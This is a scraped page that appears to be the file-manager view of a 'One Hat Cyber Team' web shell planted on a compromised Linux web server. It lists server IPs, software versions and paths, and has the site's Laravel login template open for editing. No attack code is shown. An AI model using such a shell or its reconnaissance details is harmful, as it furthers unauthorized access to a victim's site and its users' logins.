⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.91
Server IP:
157.245.101.34
Server:
Linux skvinfotech-website 5.4.0-131-generic #147-Ubuntu SMP Fri Oct 14 17:07:22 UTC 2022 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
wesellnew
/
core
/
resources
/
views
/
user
/
auth
/
Edit File: login.blade.php
@extends('master.front') @section('title') {{__('Login')}} @endsection @section('content')
{{__('Home')}}
{{__('Login/Register')}}
@csrf
{{__('Login')}}
@error('login_email')
{{$message}}
@enderror
@error('login_password')
{{$message}}
@enderror
{{__('Remember me')}}
{{__('Forgot password?')}}
{{ __('Login') }}
@if($setting->facebook_check == 1)
{{ __('Facebook login') }}
@endif @if($setting->google_check == 1)
{{ __('Google login') }}
@endif
{{__('Register')}}
@csrf
{{__('First Name')}}
@error('first_name')
{{$message}}
@endif
{{__('Last Name')}}
@error('last_name')
{{$message}}
@endif
{{__('E-mail Address')}}
@error('email')
{{$message}}
@endif
{{__('Phone Number')}}
@error('phone')
{{$message}}
@endif
{{__('Password')}}
@error('password')
{{$message}}
@endif
{{__('Confirm Password')}}
@if ($setting->recaptcha == 1)
{!! NoCaptcha::renderJs() !!} {!! NoCaptcha::display() !!} @if ($errors->has('g-recaptcha-response')) @php $errmsg = $errors->first('g-recaptcha-response'); @endphp
{{__("$errmsg")}}
@endif
@endif
{{__('Register')}}
@endsection
Simpan